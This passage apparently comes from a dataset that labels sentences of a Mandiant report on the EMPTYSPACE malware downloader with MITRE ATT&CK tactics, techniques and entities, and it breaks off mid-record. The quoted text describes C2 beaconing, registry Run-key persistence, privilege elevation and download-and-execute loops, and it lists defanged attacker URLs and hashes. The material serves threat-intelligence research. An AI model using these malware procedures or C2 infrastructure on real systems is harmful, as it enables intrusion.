"page_number": 1, "sentence_id": 36, "context_before": "6f a2 71 f3 f3 1d 9f 3c 99 b7 4d From November 27, 2023, observed yet another shift in TTPs with regard to third-party websites used as C2.", "sentence_text": "However, now the encoded blob was appended to the image URL contained in the About section of the user frncbf2 .", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1102", "name": "Web Service" }, { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Append encoded payload blob to an image URL within a third-party web service profile for retrieval.", "entities": [ { "text": "encoded blob was appended to the image URL", "start": 17, "end": 59, "label": "Action" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s37-4442dd", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 37, "context_before": "However, now the encoded blob was appended to the image URL contained in the About section of the user frncbf2 .", "sentence_text": "This user became a member on the Ars Technica forum on November 23, 2023.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s38-69396d", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 38, "context_before": "This user became a member on the Ars Technica forum on November 23, 2023.", "sentence_text": "As of mid December 2023, the photo hosted on Ars Technica was removed together with the intermediary payload.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s39-796825", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 39, "context_before": "As of mid December 2023, the photo hosted on Ars Technica was removed together with the intermediary payload.", "sentence_text": "From mid-2023, the threat actor also updated the URL serving EMPTYSPACE.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Update the URL used to serve the EMPTYSPACE payload.", "entities": [ { "text": "updated the URL serving EMPTYSPACE", "start": 37, "end": 71, "label": "Action" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s40-29591b", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 40, "context_before": "From mid-2023, the threat actor also updated the URL serving EMPTYSPACE.", "sentence_text": "Recent infections revealed the new URL to be hxxps://evinfeoptasw.dedyn[.]io/updater.php?from=USB1 .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s41-6d33d4", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 41, "context_before": "Recent infections revealed the new URL to be hxxps://evinfeoptasw.dedyn[.]io/updater.php?from=USB1 .", "sentence_text": "The final URL is formed by appending the string \" &user= \", UUID being the unique identifier mentioned previously.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s42-911e9e", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 42, "context_before": "The final URL is formed by appending the string \" &user= \", UUID being the unique identifier mentioned previously.", "sentence_text": "The different versions of explorer.ps1 that Mandiant encountered during the research process showed how the script was incrementally changed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s43-f40bad", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 43, "context_before": "The different versions of explorer.ps1 that Mandiant encountered during the research process showed how the script was incrementally changed.", "sentence_text": "Initially, the script only focused on downloading EMPTYSPACE from an encoded URL.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Download EMPTYSPACE payload from an encoded URL.", "entities": [ { "text": "downloading EMPTYSPACE from an encoded URL", "start": 38, "end": 80, "label": "Action" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s44-519735", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 44, "context_before": "Initially, the script only focused on downloading EMPTYSPACE from an encoded URL.", "sentence_text": "It then added an intermediary stage for constructing the final URL using payloads hosted on third party websites.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1102", "name": "Web Service" } ], "procedure": "Add an intermediary stage to construct the final URL using payloads hosted on third-party websites.", "entities": [ { "text": "added an intermediary stage for constructing the final URL", "start": 8, "end": 66, "label": "Action" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s45-19eaa9", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 45, "context_before": "It then added an intermediary stage for constructing the final URL using payloads hosted on third party websites.", "sentence_text": "Later on, the capability to track infections was added.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s46-3b7a14", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 46, "context_before": "Later on, the capability to track infections was added.", "sentence_text": "EMPTYSPACE\nEMPTYSPACE is a downloader that communicates with its C2 server over HTTP.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s47-2ad0a3", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 47, "context_before": "EMPTYSPACE\nEMPTYSPACE is a downloader that communicates with its C2 server over HTTP.", "sentence_text": "It downloads and executes an executable payload served by the C2 server.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" }, { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Download executable payload from C2 server and execute it.", "entities": [ { "text": "downloads and executes an executable payload", "start": 3, "end": 47, "label": "Action" }, { "text": "C2 server", "start": 62, "end": 71, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s48-c79820", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 48, "context_before": "It downloads and executes an executable payload served by the C2 server.", "sentence_text": "The EMPTYSPACE beacon response is parsed as JSON containing a list of tasks, each of which specify a file to download to disk and execute.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" }, { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Parse C2 beacon response and download specified files to disk and execute them.", "entities": [ { "text": "parsed as JSON containing a list of tasks", "start": 34, "end": 75, "label": "Action" }, { "text": "download to disk and execute", "start": 109, "end": 137, "label": "Action" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s50-d53290", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 50, "context_before": "Runtime Broker\n.", "sentence_text": "These variants have been written in Node.js, .NET and Python.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s51-efb109", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 51, "context_before": "These variants have been written in Node.js, .NET and Python.", "sentence_text": "Yoroi noted an additional Go variant in their research.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s52-503830", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 52, "context_before": "Yoroi noted an additional Go variant in their research.", "sentence_text": "NODE.JS version\nThis version of Runtime Broker.exe (SHA256:\na4f20b60a50345ddf3ac71b6e8c5ebcb9d069721b0b0edc822ed2e7569a0bb40\n) is  a downloader compiled with nexe , a utility that bundles a Node.js app into a single executable.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s53-3f94fd", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 53, "context_before": "NODE.JS version\nThis version of Runtime Broker.exe (SHA256:\na4f20b60a50345ddf3ac71b6e8c5ebcb9d069721b0b0edc822ed2e7569a0bb40\n) is  a downloader compiled with nexe , a utility that bundles a Node.js app into a single executable.", "sentence_text": "The executable consists of Node.js runtime executable version 12.9.1 and the following items in the file overlay section:\nSHA256\n4814393285c2afcd671dbdd53b3b2021963c32a09745f83ed894e5ae4e2764b8\nat file offset 0x16B6E00 : JavaScript, the initialization component of nexe SHA256:\n461d580a16cf1fa67b4ac751dfe9d36b2de3f13c97670b3b12641f20246ce4b3\nat file offset 0x16BAC3A : DLL referred to as drivelist.node.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s54-247270", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 54, "context_before": "The executable consists of Node.js runtime executable version 12.9.1 and the following items in the file overlay section:\nSHA256\n4814393285c2afcd671dbdd53b3b2021963c32a09745f83ed894e5ae4e2764b8\nat file offset 0x16B6E00 : JavaScript, the initialization component of nexe SHA256:\n461d580a16cf1fa67b4ac751dfe9d36b2de3f13c97670b3b12641f20246ce4b3\nat file offset 0x16BAC3A : DLL referred to as drivelist.node.", "sentence_text": "Its sole purpose appears to be to produce a drive listing for use in the JavaScript payload.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s55-2812c6", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 55, "context_before": "Its sole purpose appears to be to produce a drive listing for use in the JavaScript payload.", "sentence_text": "SHA256\nfae6192a0648a892c845d9498002ca79497ea58e5315d277f65f7b243f7110e4\nat file offset 0x171683A : Main JavaScript payload referred to as index.js ; bundled by webpack.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s56-e098e7", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 56, "context_before": "SHA256\nfae6192a0648a892c845d9498002ca79497ea58e5315d277f65f7b243f7110e4\nat file offset 0x171683A : Main JavaScript payload referred to as index.js ; bundled by webpack.", "sentence_text": "Runtime Broker.exe\nwill execute \" net session \" to determine whether the current process has elevated permissions.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1069", "name": "Permission Groups Discovery" } ], "procedure": "Execute net session to determine whether the current process has elevated permissions.", "entities": [ { "text": "Runtime Broker.exe", "start": 0, "end": 18, "label": "MalwareTool" }, { "text": "execute \" net session \" to determine whether the current process has elevated permissions", "start": 24, "end": 113, "label": "Action" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s57-3f2f85", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 57, "context_before": "Runtime Broker.exe\nwill execute \" net session \" to determine whether the current process has elevated permissions.", "sentence_text": "If running as an elevated process, the sample uses the named pipe \\\\?\\pipe\\installSrvUniqID to ensure that only a single instance of the executable is running.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s58-086449", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 58, "context_before": "If running as an elevated process, the sample uses the named pipe \\\\?\\pipe\\installSrvUniqID to ensure that only a single instance of the executable is running.", "sentence_text": "The sample extracts and drops the overlay DLL (SHA256:\n461d580a16cf1fa67b4ac751dfe9d36b2de3f13c97670b3b12641f20246ce4b3\n) to /build/Release/drivelist.node.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" }, { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Extract and drop overlay DLL to a specific directory on disk.", "entities": [ { "text": "extracts and drops the overlay DLL", "start": 11, "end": 45, "label": "Action" }, { "text": "/build/Release/drivelist.node", "start": 125, "end": 173, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s59-0a3c8f", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 59, "context_before": "The sample extracts and drops the overlay DLL (SHA256:\n461d580a16cf1fa67b4ac751dfe9d36b2de3f13c97670b3b12641f20246ce4b3\n) to /build/Release/drivelist.node.", "sentence_text": "The sample invokes the drivelist.node module to produce a drive listing.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1083", "name": "File and Directory Discovery" } ], "procedure": "Invoke drivelist.node module to enumerate drives on the system.", "entities": [ { "text": "invokes the drivelist.node module", "start": 11, "end": 44, "label": "Action" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s60-0c89c1", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 60, "context_before": "The sample invokes the drivelist.node module to produce a drive listing.", "sentence_text": "The sample iterates this listing to search for a removable and readable/writeable drive whose mount point path contains the Hangul Filler character (E3 85 A4 in UTF-8).", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1083", "name": "File and Directory Discovery" } ], "procedure": "Iterate drive listing to search for removable and writable drives with specific mount path characteristics.", "entities": [ { "text": "iterates this listing to search for a removable and readable/writeable drive", "start": 11, "end": 87, "label": "Action" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s61-330210", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 61, "context_before": "The sample iterates this listing to search for a removable and readable/writeable drive whose mount point path contains the Hangul Filler character (E3 85 A4 in UTF-8).", "sentence_text": "This is possibly to determine whether the instance of the malware is the initial infection from a USB.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s62-7d6140", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 62, "context_before": "This is possibly to determine whether the instance of the malware is the initial infection from a USB.", "sentence_text": "The sample only proceeds with the remaining functionality if such a path is found.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s63-1690cd", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 63, "context_before": "The sample only proceeds with the remaining functionality if such a path is found.", "sentence_text": "If not running as an elevated process, the sample sets the registry value HKCU\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Node_Run to the executable path and attempts to run as an elevated process.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1547.001", "name": "Registry Run Keys / Startup Folder" }, { "id": "T1548", "name": "Abuse Elevation Control Mechanism" } ], "procedure": "Set registry Run key for persistence and attempt to execute process with elevated privileges.", "entities": [ { "text": "sets the registry value HKCU\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Node_Run", "start": 50, "end": 139, "label": "Action" }, { "text": "attempts to run as an elevated process", "start": 167, "end": 205, "label": "Action" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s64-8284fd", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 64, "context_before": "If not running as an elevated process, the sample sets the registry value HKCU\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Node_Run to the executable path and attempts to run as an elevated process.", "sentence_text": "If already running as an elevated process, the sample deletes the aforementioned registry value and sends an HTTP POST request to hxxps[:]//bobsmith[.]apiworld[.]cf/license.php with a Base64-encoded beacon containing basic host information such as hostname, username, and localtime.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0011", "name": "Command and Control" }, { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1112", "name": "Modify Registry" }, { "id": "T1071.001", "name": "Web Protocols" }, { "id": "T1046", "name": "Network Service Discovery" } ], "procedure": "Delete registry Run key and send HTTP POST beacon with encoded host information to remote server.", "entities": [ { "text": "deletes the aforementioned registry value", "start": 54, "end": 95, "label": "Action" }, { "text": "sends an HTTP POST request", "start": 100, "end": 126, "label": "Action" }, { "text": "hxxps[:]//bobsmith[.]apiworld[.]cf/license.php", "start": 130, "end": 176, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s65-906860", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 65, "context_before": "If already running as an elevated process, the sample deletes the aforementioned registry value and sends an HTTP POST request to hxxps[:]//bobsmith[.]apiworld[.]cf/license.php with a Base64-encoded beacon containing basic host information such as hostname, username, and localtime.", "sentence_text": "The sample refers to itself as CINSTALLER1 in this beacon.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s66-11df86", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 66, "context_before": "The sample refers to itself as CINSTALLER1 in this beacon.", "sentence_text": "The beacon response is parsed as JSON containing a list of tasks, each of which specify a file to download to disk and execute.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "The malware processes task instructions from a beacon response to download files to disk and execute them.", "entities": [ { "text": "download to disk and execute", "start": 98, "end": 126, "label": "Action" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s67-6b1676", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 67, "context_before": "The beacon response is parsed as JSON containing a list of tasks, each of which specify a file to download to disk and execute.", "sentence_text": "The malware may additionally drop two batch files, execute.bat and command.bat, to %TEMP% during the process of attempting to run the sample as an elevated process.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.003", "name": "Windows Command Shell" } ], "procedure": "Drop batch files in the TEMP directory to support execution during privilege escalation.", "entities": [ { "text": "drop two batch files, execute.bat and command.bat, to %TEMP%", "start": 29, "end": 89, "label": "Action" }, { "text": "%TEMP%", "start": 83, "end": 89, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s68-91085f", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 68, "context_before": "The malware may additionally drop two batch files, execute.bat and command.bat, to %TEMP% during the process of attempting to run the sample as an elevated process.", "sentence_text": ".NET version\nThis variant (SHA256:\n8a492973b12f84f49c52216d8c29755597f0b92a02311286b1f75ef5c265c30d\n) is an obfuscated .NET based downloader.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s69-bab29b", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 69, "context_before": ".NET version\nThis variant (SHA256:\n8a492973b12f84f49c52216d8c29755597f0b92a02311286b1f75ef5c265c30d\n) is an obfuscated .NET based downloader.", "sentence_text": "The malware can download and execute payloads from the C2 server, restart itself with elevated privileges, delete downloaded payloads, and communicate system information to the C2 server.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" }, { "id": "TA0002", "name": "Execution" }, { "id": "TA0004", "name": "Privilege Escalation" }, { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" }, { "id": "T1071.001", "name": "Web Protocols" }, { "id": "T1548", "name": "Abuse Elevation Control Mechanism" }, { "id": "T1070", "name": "Indicator Removal" } ], "procedure": "Download and execute payloads from C2, restart with elevated privileges, delete payloads, and send system information to C2.", "entities": [ { "text": "download and execute payloads from the C2 server", "start": 16, "end": 64, "label": "Action" }, { "text": "restart itself with elevated privileges", "start": 66, "end": 105, "label": "Action" }, { "text": "delete downloaded payloads", "start": 107, "end": 133, "label": "Action" }, { "text": "communicate system information to the C2 server", "start": 139, "end": 186, "label": "Action" }, { "text": "C2 server", "start": 55, "end": 64, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s70-0582b3", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 70, "context_before": "The malware can download and execute payloads from the C2 server, restart itself with elevated privileges, delete downloaded payloads, and communicate system information to the C2 server.", "sentence_text": "The malware, when executed, optionally expects the following command line argument:\nelevated_true\nIf the argument is provided, the malware will attempt to restart itself with elevated privileges.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1548", "name": "Abuse Elevation Control Mechanism" } ], "procedure": "Execute malware with command-line argument and restart itself with elevated privileges.", "entities": [ { "text": "restart itself with elevated privileges", "start": 155, "end": 194, "label": "Action" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s71-9242a5", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 71, "context_before": "The malware, when executed, optionally expects the following command line argument:\nelevated_true\nIf the argument is provided, the malware will attempt to restart itself with elevated privileges.", "sentence_text": "At this point, the execution only proceeds if the directory exists.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s72-3c75d4", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 72, "context_before": "At this point, the execution only proceeds if the directory exists.", "sentence_text": "The next step is a download loop for which a JSON object with the following structure is generated:\n{\n\"from\": \"CINSTALLER1\",\n\"path\": \"Malware path\", \"username\": \"\", \"cwd\": \"\", \"time\": \"\", \"temp\": \"Temporary path\", \"programs\": \"Program Files path\" } The malware will then base64 encode the generated JSON and send it in a POST request to the C2 server.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Encode generated JSON with Base64 and send it via HTTP POST to the C2 server.", "entities": [ { "text": "encode the generated JSON and send it in a POST request to the C2 server", "start": 392, "end": 464, "label": "Action" }, { "text": "C2 server", "start": 455, "end": 464, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s73-413632", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 73, "context_before": "The next step is a download loop for which a JSON object with the following structure is generated:\n{\n\"from\": \"CINSTALLER1\",\n\"path\": \"Malware path\", \"username\": \"\", \"cwd\": \"\", \"time\": \"\", \"temp\": \"Temporary path\", \"programs\": \"Program Files path\" } The malware will then base64 encode the generated JSON and send it in a POST request to the C2 server.", "sentence_text": "The configured C2 server for this sample is as follows:\nhxxps://bobsmith.apiworld[.]cf/license.php\nThe base64 string is prepended with \"AA\" such that the POST data looks as follows:\n\"AA\"\n", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s74-66e1b4", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 74, "context_before": "The configured C2 server for this sample is as follows:\nhxxps://bobsmith.apiworld[.]cf/license.php\nThe base64 string is prepended with \"AA\" such that the POST data looks as follows:\n\"AA\"\n", "sentence_text": "\"==\" The malware expects the C2 server to return a collection of objects.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s75-dd4306", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 75, "context_before": "\"==\" The malware expects the C2 server to return a collection of objects.", "sentence_text": "For each object in the collection, it extracts specific data: a link, a path, a command (cmd), arguments for the command, and a deletion flag (delete).", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Extract command and execution parameters received from C2 response objects.", "entities": [ { "text": "extracts specific data: a link, a path, a command (cmd), arguments for the command, and a deletion flag (delete)", "start": 38, "end": 150, "label": "Action" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s76-84dc60", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 76, "context_before": "For each object in the collection, it extracts specific data: a link, a path, a command (cmd), arguments for the command, and a deletion flag (delete).", "sentence_text": "For each object in the received collection, if a URL and path are provided, the program attempts to download a file from the URL to the specified path.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Download file from a URL to a specified path based on received instructions.", "entities": [ { "text": "attempts to download a file from the URL to the specified path", "start": 88, "end": 150, "label": "Action" }, { "text": "URL", "start": 49, "end": 52, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s77-f13ed7", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 77, "context_before": "For each object in the received collection, if a URL and path are provided, the program attempts to download a file from the URL to the specified path.", "sentence_text": "This download is retried indefinitely every 5 seconds in case of failure.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Retry file download repeatedly at fixed intervals upon failure.", "entities": [ { "text": "download is retried indefinitely every 5 seconds in case of failure", "start": 5, "end": 72, "label": "Action" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s78-8b428e", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 78, "context_before": "This download is retried indefinitely every 5 seconds in case of failure.", "sentence_text": "If the deletion flag (delete) is set and both the URL and path are provided, the program attempts to delete the downloaded file after execution.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.004", "name": "File Deletion" } ], "procedure": "Delete the downloaded file after execution to remove artifacts.", "entities": [ { "text": "attempts to delete the downloaded file after execution", "start": 89, "end": 143, "label": "Action" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s79-fdcb4c", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 79, "context_before": "If the deletion flag (delete) is set and both the URL and path are provided, the program attempts to delete the downloaded file after execution.", "sentence_text": "In at least one investigation, Mandiant has observed this version of EMPTYSPACE relaying on additional resources on the host, most likely dropped during the initial infection.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s80-783273", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 80, "context_before": "In at least one investigation, Mandiant has observed this version of EMPTYSPACE relaying on additional resources on the host, most likely dropped during the initial infection.", "sentence_text": "These are bootstrap.pyc, which is a Python compiled version of EMPTYSPACE with a similar capability of communicating with a list of embedded C2 domains and the QUIETBOARD backdoor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s81-c7ef05", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 81, "context_before": "These are bootstrap.pyc, which is a Python compiled version of EMPTYSPACE with a similar capability of communicating with a list of embedded C2 domains and the QUIETBOARD backdoor.", "sentence_text": "EMPTYSPACE interacts with these files via an intermediary executable, a Python wrapper named \" RuntimeBroker .exe \"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s82-e781ba", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 82, "context_before": "EMPTYSPACE interacts with these files via an intermediary executable, a Python wrapper named \" RuntimeBroker .exe \"", "sentence_text": "(vs \" Runtime Broker.exe \") located in C:\\Windows.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s83-d7c87f", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 83, "context_before": "(vs \" Runtime Broker.exe \") located in C:\\Windows.", "sentence_text": "Python Version (Bootstrap.pyc)\nOne of the versions analyzed by for bootstrap.pyc is shown in Figure 10 (decompiled code).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s84-bbfb25", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 84, "context_before": "Python Version (Bootstrap.pyc)\nOne of the versions analyzed by for bootstrap.pyc is shown in Figure 10 (decompiled code).", "sentence_text": "The BOOTSTRAP_VERSION is set to ‘PYBOOTSTRAP ’, suggesting the existence of other versions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s85-41af14", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 85, "context_before": "The BOOTSTRAP_VERSION is set to ‘PYBOOTSTRAP ’, suggesting the existence of other versions.", "sentence_text": "The code continuously attempts to reach a specific URL ( hxxp://google[.]com/generate_204 ) with a 30-second timeout.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1102", "name": "Web Service" } ], "procedure": "Continuously attempt to reach a specific URL.", "entities": [ { "text": "continuously attempts to reach a specific URL", "start": 9, "end": 54, "label": "Action" }, { "text": "hxxp://google[.]com/generate_204", "start": 57, "end": 89, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-33_mandiant_report-p1-s86-02bfea", "source": "mandiant", 